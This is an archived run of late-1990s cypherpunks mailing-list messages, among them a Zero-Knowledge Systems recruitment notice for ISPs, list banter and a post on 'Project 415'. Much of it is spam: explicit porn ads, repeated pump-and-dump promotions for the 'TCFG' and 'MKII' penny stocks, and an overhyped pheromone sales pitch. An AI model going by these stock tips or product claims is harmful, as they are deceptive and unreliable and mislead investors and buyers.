Freedom Partnership Program: Value-Added Service For ISPs

Zero-Knowledge Systems is currently in seeking ISPs to join as "Founding
Members" in the Freedom Network. Freedom is revolutionary software that
provides the first complete privacy solution to Internet users, including
email, web-browsing, chat, telnet and Usenet. By allowing users to create
and manage multiple authenticated identities and using full-strength
cryptography, Internet users can also block SPAM and manage their person
information. See http://www.zks.net for full details.

Being a member of the Freedom Network will allow an ISP to differentiate
itself from the competition while fighting for on-line privacy. The Freedom
Partnership Program has been designed to be revenue generating and cost
reducing for ISPs.

Freedom software is provided free of charge to all ISPs. Internal
beta-testing of the Freedom network will begin in mid-December, 1998 and the
"Founding Members" of the Freedom Network should be prepared to begin
working with our technical staff at that time. Beta testing should last 4-8
weeks. The Freedom server software runs on a Linux or Solaris operating
system and needs to run on a
dedicated machine. Server participants should be able to contribute a T-1
during the beta testing period. Members will also be entitled to proceeds
from the revenue sharing program (after the beta testing period). The
revenue sharing program is designed to provide ISPs with 110% - 130% of
bandwidth costs.

Participation has its advantages. Founding Member ISPs will receive
"Preferred Member" status on our web-site and software. When users of the
Freedom client do a search for an ISP by telephone area code, Founding
Members will be the
recommended ISP in a given geographical area. All Founding Members will be
listed in relevant press releases made by Zero-Knowledge Systems. Founding
Members will also be guaranteed to earn 10% on all click-thru sales
(web-link program) for the next two years. Participating ISPs will also get
"Prominent Placement" - have their company name/logo displayed on a
high-traffic area of our web-site. Distinctive buttons and banners will be
given to all founding members receive  to put on their web-site.

Initially, the Freedom Network will be comprised of 15 Founding Member ISPs
which will be located around the world. We plan to have an ISP in each of
the following areas: Canada(3) - east coast, central, west coast;
U.S.A.(7) - northeast, northwest, southeast, southwest, west coast, silicon
valley, Midwest; United Kingdom(1); Holland(1); Germany(1); Australia(1);
and, the Caribbean(1).

If you are interested in becoming a "Founding Member" or simply joining the
Freedom Network or know of an ISP that would be interested, please contact
Greg Adelstein, Director of Business Development, Zero-Knowledge Systems,
greg@zks.net or 514-286-2636.
--------------------------------------------------------


_________________________________________________________________________
Austin Hill                                   Zero-Knowledge Systems Inc.
President                                                Montreal, Quebec
Phone: 514.286.2636 Ext. 226                            Fax: 514.286.2755
E-mail: austin@zks.net                                 http://www.zks.net

             Zero Knowledge Systems Inc. - Nothing Personal

PGP Fingerprints
2.6.3i = 3F 42 A2 0D AF 78 20 ED  A2 BB AD BE 8B 40 5E 64
5.5.3i = 77 1E 62 21 B3 F0 EB C0  AA 6C 65 30 56 CA BA C4 94 26 EC 00
keys available at
http://www.nai.com/products/security/public_keys/pub_key_default.asp
_________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 1 Dec 1998 12:15:13 +0800
To: cypherpunks@cyberpass.net
Subject: Sternlight on Cypherpunks
Message-ID: <199812010354.VAA19426@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Sternlight has denied us!

David Sternlight <david@sternlight.com> writes:

> I am not on the Cypherpunks list. Given the tone of some posters I
> don't' see that as a useful list. 

> I never participated in that list. It was suggested to me by a very
> senior member of the list that all the wrangling typical of that list
> meant it wasn't worth the time, and I took his advice. 


              I never had sex with that woman.
                                     -Bill Clinton

              I never participated in that list.
                                     -David Sternlight

Correct me if I'm wrong, but didn't David join the list some time ago, 
and depart with a giant PLONK when someone called him a "statist"?

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brutal@brutalsex.com
Date: Fri, 29 Jan 1999 23:49:15 +0800
To: <cypherpunks@cyberpass.net>
Subject: Attract Opposite SEX Like Never Before!
Message-ID: <199901291506.AAA17938@mail.jumbo.or.jp>
MIME-Version: 1.0
Content-Type: text/plain



WELCOME TO THE BRUTAL SEX SITE

~~~Lesbian Orgy Gang Bang Video...Right Here!~~~

Check out the Huge Archive of XXX Hardcore Photos and View from 
an INCREDIBLE amount XXX Adult Films with SOUND!!!

Do You Like LIVE 18-21 yr old girls? You can direct the action 
..

Explore all this and more 24 hours a day 7 days a week!!!

CLICK HERE

Go To http://www.BrutalSEX.com











18+ Only.  Reply with remove in subject to be removed.
mediaweb ann arbor mi 48103 (734)669-8570




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sender04@mail.usa.com
Date: Tue, 9 Feb 1999 14:04:44 +0800
To: <cypherpunks@toad.com>
Subject: ADV:Valentine's for the Very Special!
Message-ID: <199902090536.NAA19336@db.>
MIME-Version: 1.0
Content-Type: text/plain



For Your Valentine!!


Scrumptious, dried fruit and nut packs artistically arranged in a 
variety of designer boxes normally featured at Neiman Marcus, 
Saks Fifth Avenue, Harrods of London and other prestigious 
stores. Now available DIRECT from the source:  Torn Ranch of 
California, quietly supplying exquisite fruit and nut packs for 
40 years to prestige outlets. 

Send a Valentine gift that is a touch above the ordinary.  Fancy 
and extra-fancy grade, moist fruits.  Chocolate dipped Australian 
apricots in designer arrangements.  Jumbo nuts and fresh-baked 
mini-biscotti.  Make an endearing impression for $10 or $20.  
Check out our selections and place an order this week to surprise 
your Valentine! 


http://204.238.155.37/ca2/tornranch


Reply with remove to be removed
MediaWeb AnnArbor MI 7346698570




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foreclosure-world@foreclosure-world.cc
Date: Tue, 10 Nov 1998 01:53:14 -0800 (PST)
To: chongo@toad.com
Subject: Accept Credit Cards
Message-ID: <19981109191303.TAB09534@foreclosure-world.cc>
MIME-Version: 1.0
Content-Type: text/plain


ACCEPT CREDIT CARDS!!
PRE-APPROVED APPLICATION
Good Credit/Bad Credit/No Credit

NO APPLICATION FEES
For a Limited Time Only!
Regular $195.00 Application Fee Waived For This Offer!

Increase Your Business Up To 100% Or More,
Just By Accepting Credit Cards!
This Means More Customers...More Orders...More Money!
We Specialize in Home Based Businesses - Apply Today!
Accept Visa, Mastercard, American Express, and Discover!

Apply Now by visiting our Online Application Site!
We are overwhelmed with Responses...

http://209.215.68.186/


* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
If you have received this message in error, please 
accept our apology as a responsible e-mailer, and 
reply with the word REMOVE in the subject line.
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN NOV 1 <stuffed@stuffed.net>
Date: Sun, 1 Nov 1998 01:07:29 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981101081000.7984.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ COMPUTER SLUTS
+ JACK'S HOUSE OF SLUTS
+ XXX EXTREME
+ HOT HUNNYS HARDCORE
+ HOT PICS
+ LADY PASSION'S EROTIC HAVEN
+ EXCESSIVE
+ PURE XXXCITEMENT
+ VELVET PALACE
+ THE TIKI CLUB
+ BONUS PIC 1 -> http://www.stuffed.net/home/30323.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/11483.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/609.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/31873.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/21230.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: newscaster@hampton.net
Date: Mon, 2 Nov 1998 06:31:15 -0800 (PST)
To: <199610012026.naa28151@toad.com>
Subject: No Subject
Message-ID: <199811021431.GAA20705@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


11/02/98


Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif. USA


OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for...

























 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON NOV 2 <stuffed@stuffed.net>
Date: Mon, 2 Nov 1998 01:14:06 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981102081000.22994.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ CHAPO'S SEX PAGES
+ PORN VAULT
+ FREE XXX ZONE
+ SHADOW X
+ WAYWARD WOMEN
+ EACH STROKE COUNTS
+ DIANA'S DEN
+ PORN POWER
+ BITCHES IN HEAT
+ FAST LOADING XXX HARDCORE
+ BONUS PIC 1 -> http://www.stuffed.net/home/24936.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/22717.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/14745.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/13628.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/17492.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bettyrubble@3253137429
Date: Mon, 2 Nov 1998 08:37:24 -0800 (PST)
To: fireball@3253137429
Subject: Attract Women &/or Men (and keep them)!
Message-ID: <199811021637.IAA21504@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 






































The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please send an email to: letusknow@start.com.au with "filter me" in the subject line. Please do not send mutiple submissions as this will slow down the system, normally it will take 1 week. If you send too many or mailbomb this system not only will your name not be filtered for future mailings but you will cause others not to be filtered either as you might overload the system. Mailbombings will be tracked back to the offender and legal action will be taken.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nations@freeyellow.com
Date: Mon, 2 Nov 1998 10:42:28 -0800 (PST)
To: <owner-cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199811021842.KAA22458@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                            11/02/98


Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif. USA


OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.....

























 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE NOV 3 <stuffed@stuffed.net>
Date: Tue, 3 Nov 1998 01:20:23 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981103081000.20022.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ BOOBLAND
+ BLONDES WITH BIG TITS
+ XXX WONDERLAND
+ SATURN SEX SITE
+ X-QUALITY BEAUTIFUL NUDE MODELS
+ MASTURB8
+ CUM CATCHERS
+ XXX FREE PUSSY
+ PLAY SLUTS
+ PUSSY PUSSY
+ BONUS PIC 1 -> http://www.stuffed.net/home/19550.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/1183.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/28881.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/28151.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/13754.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: explorer@netcom.com
Date: Tue, 3 Nov 1998 11:25:12 -0800 (PST)
Subject: No Subject
Message-ID: <199811031924.LAA01821@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                             11/03/98

INTERNET NEWS/Y2K (YEAR 2000 SOLUTION)

Most  of  the  information  from  the  silicon  valley is 
obtained  from  the  local  pubs/bars. Un-named  sources 
discussing  the  Y2K  problem  at  the  local  brew  revealed, 
that  2  of  the  big  valley  software  manufacturers  are  
in  a  bidding  war  for  software  technology  created  by  
a  small publicly  traded  company  OTC-BB  symbol:"TCFG" that  
is  in  the  process  of  obtaining  a  patent.


This  3  year  old  emerging  growth  company  has  tested  
and  out  performed  the  "Big  Boys"! Several  rogue  
ex-employees  of  the  "giants" joined  this  company  and  
claims  abound  about  their  success.


If  truth  is  stronger  than  fiction  then  "TCFG"  is
going  to  play  with  the  big  boys. We  all  know  the  
Y2K  problem  and  what  the  real  solution  would  mean  
to  all  of  us  $$!


How  much  will  they  pay  "TCFG"?
Back  to  the  pub  friday  evening  for  more  info...
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: explorer@netcom.com
Date: Wed, 4 Nov 1998 05:22:07 -0800 (PST)
Subject: No Subject
Message-ID: <199811041321.FAA05928@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


11/04/98


INTERNET  NEWS
8  Pine  Circle  Dr. Silicon  Valley,Ca. USA


INTERNET NEWS/Y2K (YEAR 2000 SOLUTION)

Most  of  the  information  from  the  silicon  valley is 
obtained  from  the  local  pubs/bars. Un-named  sources 
discussing  the  Y2K  problem  at  the  local  brew  revealed, 
that  2  of  the  big  valley  software  manufacturers  are  
in  a  bidding  war  for  software  technology  created  by  
a  small publicly  traded  company  OTC-BB  symbol:"TCFG" that  
is  in  the  process  of  obtaining  a  patent.


This  3  year  old  emerging  growth  company  has  tested  
and  out  performed  the  "Big  Boys" with  a  system  
industry  experts  consider  to  be  a  technological  
breakthrough! Several  rogue  ex-employees  of  the  "giants" 
joined  this  company  and  claims  abound  about  their  
success.


If  truth  is  stronger  than  fiction  then  "TCFG"  is
going  to  play  with  the  big  boys. We  all  know  the  
Y2K  problem  and  what  the  real  solution  would  mean  
to  all  of  us  $$!


How  much  will  they  pay  "TCFG"?
Back  to  the  pub  friday  evening  for  more  info...
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED NOV 4 <stuffed@stuffed.net>
Date: Wed, 4 Nov 1998 01:15:59 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981104081000.23189.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ BIG BEAR AMAZING PICS
+ SWEBABES
+ YVONNE'S ASIAN GIRLS
+ HOTT SHOTTS
+ MISGUIDED
+ CHEERLEADER SQUAD
+ THE BRASS ASS
+ CUM CATCHERS
+ XXX VAGINAS
+ PORNCLIPS
+ BONUS PIC 1 -> http://www.stuffed.net/home/14164.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/12417.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/10249.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/9906.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/10016.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stocknews11_5_98iil@worldnet.att.net
Date: Wed, 4 Nov 1998 15:31:10 -0800 (PST)
To: smartinvestor98i@newsletterb.com
Subject: RE: URGENT BUY ALERT!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company:  Mark I Industries
Symbol:   M K I I   (mkii)
Price:    1/4  ($.25/share)

M K I I  has announced an affiliation with one of 
their subsidiaries and AT&T.  Management projects
a $100 million revenue goal at their current rate
of growth with "the company's stock to trade in
the $4 range".

M K I I is rated an immediate and "STRONG BUY".
For more information on  M K I I go to:
http://quote.yahoo.com











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solution@hampton.net
Date: Thu, 5 Nov 1998 08:18:02 -0800 (PST)
Subject: No Subject
Message-ID: <199811051617.IAA13208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


11/05/98


INTERNET  NEWS
8  Pine  Circle  Dr. Silicon  Valley,Ca. USA


INTERNET NEWS/Y2K (YEAR 2000 SOLUTION)

Most  of  the  information  from  the  silicon  valley is 
obtained  from  the  local  pubs/bars. Un-named  sources 
discussing  the  Y2K  problem  at  the  local  brew  revealed, 
that  2  of  the  big  valley  software  manufacturers  are  
in  a  bidding  war  for  software  technology  created  by  
a  small publicly  traded  company  OTC-BB  symbol:"TCFG" that  
is  in  the  process  of  obtaining  a  patent.


This  3  year  old  emerging  growth  company  has  tested  
and  out  performed  the  "Big  Boys" with  a  system  
industry  experts  consider  to  be  a  technological  
breakthrough! Several  rogue  ex-employees  of  the  "giants" 
joined  this  company  and  claims  abound  about  their  
success.


If  truth  is  stronger  than  fiction  then  "TCFG"  is
going  to  play  with  the  big  boys. We  all  know  the  
Y2K  problem  and  what  the  real  solution  would  mean  
to  all  of  us  $$!


How  much  will  they  pay  "TCFG"?
Back  to  the  pub  friday  evening  for  more  info...
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU NOV 5 <stuffed@stuffed.net>
Date: Thu, 5 Nov 1998 01:20:59 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981105081000.20638.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ PRIVATE COLLECTION
+ HOT ROD
+ A1 HARDCORE
+ SILICON SLUT
+ RETRO XXX
+ NATURAL BODIES
+ A W PHOTOGRAPHY
+ ONLY EROTICA
+ DEBBIE'S SEX SITE
+ NUDE PICS
+ BONUS PIC 1 -> http://www.stuffed.net/home/8778.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/23651.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/24385.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/24429.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/6277.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Nov 1998 08:34:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Project 415
Message-ID: <199811051634.LAA27413@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Dore, a British engineer involved in SETI research
who had picked up signals from a secret NSA/GCHQ 
intelligence satellite and believed them to be from outer 
space, was asked by the agencies on November 2 to 
cease and desist publishing his findings and to cancel a 
planned press conference to tell his latest news, or face
punishment under the Official Secrets Act. The agencies 
said the satellite was part of "Project 415." 

   http://jya.com/project415.htm

This was noted here a few days ago, but that was before
Paul's description of the agencies' visit to his home
was pulled from its original URL, along with related files
which described his findings as well as confirmations by 
other researchers:

   http://www.geocities.com/CapeCanaveral/Hall/7193/cancelled.html

A Project 415 (maybe the same) was first reported by Duncan 
Campbell in a 1988 article in The New Statesman, in which he
also gave the first public description of ECHELON:

   http://jya.com/echelon-dc.htm

It may not be related to Paul Dore's situation but Duncan's
article has had some 9,000 downloads in the last 24 hours.
Anyone seen a news report on the topic?

Thanks to KF for the lead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Fri, 6 Nov 1998 02:05:28 -0800 (PST)
To: undisclosed-recipients:;
Subject: Announcing Extensis Preflight Pro 2.1
Message-ID: <bulk.9978.19981105133810@mailblast.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


The Award-Winning, Preflighting Tool from Extensis Just Got
Better. http://www.extensis.com/products/PreflightPro

* New! Now inspect your Acrobat(r) PDF Files!
* Inspect, correct and collect print jobs for perfect prepress delivery.
* Advanced features include customizable inspection profiles, PDF
creation, and AppleScript Automation.
* FREE!  5 free copies of Collect Pro with each copy of Preflight Pro!

Extensis Preflight Pro 2.1 answers all of your Preflight questions. 
Designed to save prepress professionals time and money, Preflight Pro
inspects your documents and corrects problems to ensure they are
error-free prior to printing.  

With an interface that mimics the traditional prepress workflow,
